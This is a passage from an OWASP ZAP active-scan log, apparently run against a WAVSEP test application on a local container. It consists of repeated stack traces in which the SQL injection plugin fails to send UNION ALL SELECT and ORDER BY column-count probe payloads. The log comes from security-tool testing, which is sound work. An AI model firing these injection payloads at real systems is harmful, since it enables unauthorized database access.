org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688511 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688512 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688514 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688515 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688516 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688518 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688520 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688523 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688526 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 9496#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 9496# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688527 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688531 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688535 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688540 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 